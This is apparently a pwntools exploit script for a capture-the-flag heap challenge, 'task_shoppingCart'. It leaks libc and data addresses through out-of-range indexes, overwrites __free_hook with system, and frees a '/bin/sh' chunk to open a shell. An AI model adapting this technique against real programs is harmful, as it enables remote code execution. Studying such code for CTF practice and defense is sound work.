from pwn import *
#context.log_level='debug'
# Paths of the challenge binary and the libc used for symbol lookups later on.
BINARY_PATH = './task_shoppingCart'
LIBC_PATH = './libc-2.23.so'

# Target process and ELF metadata (GOT/PLT for the binary, symbols for libc).
cn = process(BINARY_PATH)
elf = ELF(BINARY_PATH)
libc = ELF(LIBC_PATH)

# 8-byte little-endian packing of strtoul's GOT slot address; this is the
# payload fed to the money prompt repeatedly further down.
strtoul_got = p64(elf.got['strtoul'])
def money(s):
    """Pick menu option 1 and answer the "RMB or Dollar?" prompt with *s*."""
    prompt = 'RMB or Dollar?'
    cn.sendline('1')
    cn.recvuntil(prompt)
    cn.sendline(s)
def add(leng, name):
    """Pick menu option 1, answer the name-length prompt with *leng*, then send *name*."""
    cn.sendline('1')
    cn.recvuntil('How long is your goods name?')
    for line in (str(leng), name):
        cn.sendline(line)
def delete(index):
    """Pick menu option 2 and send *index* as a decimal string."""
    for line in ('2', str(index)):
        cn.sendline(line)
def modify(index, value):
    """Pick menu option 3, send *index* as a decimal string, then send *value* verbatim."""
    for line in ('3', str(index), value):
        cn.sendline(line)
# Answer the money prompt 0x13 times in the loop and once more afterwards;
# the original comment notes that the content sent here is arbitrary.
for i in range(0x13):
    money(strtoul_got)
money(strtoul_got)
success(hex(elf.plt['strtoul']))
cn.sendline('3')

# --- leak the libc base ---
add(0x90, 'a' * 0x10)  # item 0; original comment: unsorted bin
add(0x18, '/bin/sh\x00')  # item 1; original comment: avoids consolidation with the top chunk
delete(0)
# Menu 1 (add) with size 0; original comment: the size does not change fd.
cn.sendline('1')
cn.sendline('0')
# Menu 3 (modify) on index 2; the 6 bytes echoed after the prompt are the leak.
cn.sendline('3')
cn.sendline('2')
cn.recvuntil('OK, what would you like to modify ')
raw = cn.recv(6)
leak_addr = u64(raw.ljust(8, '\x00'))
success('leak_addr:' + hex(leak_addr))  # original comment: main_arena + 232
# Hard-coded for the libc-2.23 build loaded above; original comment:
# main_arena - libc = 0x3c4b20 + 232 (from gdb).
libc_base = leak_addr - 0x3c4c08
'''
main_arena和libc之间具有固定的相对偏移0x3c4b20
'''
success('libc_base:' + hex(libc_base))
#gdb.attach(cn)
cn.sendline('a')  # answers the pending modify prompt; original comment: "random"
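# NOTE(review): in the original file the three Chinese lines below were bare text
# outside any string or comment (a SyntaxError, so the script could not run);
# they are kept here as comments. Translated:
#   This is another way to leak an address: free a chunk into a bin, let free()
#   set its fd to the corresponding address, and malloc does not rewrite fd.
#   Which bin to use depends on the target: the unsorted bin for a libc leak,
#   a fastbin for a heap leak.
# The heap-leak sequence below sits inside a string literal in the original, so
# it never executes, and `heap` is not referenced anywhere later in the script.
# It is left verbatim rather than guessed at — TODO confirm whether it was meant
# to run.
'''
#leak heap
add(0x10,'d'*0xf)#3 fastbin
add(0x10,'c'*0xf)#4 fastbin
delete(3)
delete(4)
#gdb.attach(cn)
cn.sendline('1')#add 5
cn.sendline('0')#size do not change fd
cn.sendline('3')#modify
cn.sendline('5')#Index
cn.recvuntil('OK, what would you like to modify ')
heap = u64(cn.recv(6).ljust(8,'\x00'))
success('heap:'+hex(heap))# chunk3
cn.sendline('test')
'''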
# --- leak a .data address ---
'''
这里是泄露.data段中的一个数据,该数据的内容就是本地址。这个是否具有普遍性还有待调试
'''
# Menu 3 (modify) with index -47. The original note (string above) says the value
# read back is a .data entry whose content is its own address, and that whether
# this holds generally is still to be checked.
cn.sendline('3')
cn.sendline('-47')
cn.recvuntil('OK, what would you like to modify ')
raw = cn.recv(6)
data_addr = u64(raw.ljust(8, '\x00'))
success('data_addr:' + hex(data_addr))
# Send the same value back so the entry is left unchanged.
cn.sendline(p64(data_addr))
# --- overwrite free_hook ---
'''
针对got表不能修改的情况下可以考虑修改free_hook,malloc_hook
'''
# Hard-coded for the libc-2.23 build loaded above; original comment: free_hook - main_arena.
offset = 0x1c88
main_arena = leak_addr - 232  # leak_addr was noted as main_arena + 232
free_hook_addr = main_arena + offset
money_addr = data_addr + 0x38
success('money_addr:' + hex(money_addr))
# The same modify(-20, ...) write is issued twice in the original; kept verbatim —
# TODO confirm whether the repetition is required.
modify(-20, p64(free_hook_addr))
modify(-20, p64(free_hook_addr))
modify(-18, p64(money_addr))
system = libc_base + libc.symbols['system']
success('system_addr:' + hex(system))
modify(-38, p64(system))
# Free item 1 (created earlier with '/bin/sh\x00'), then hand the session to the user.
delete(1)
cn.interactive()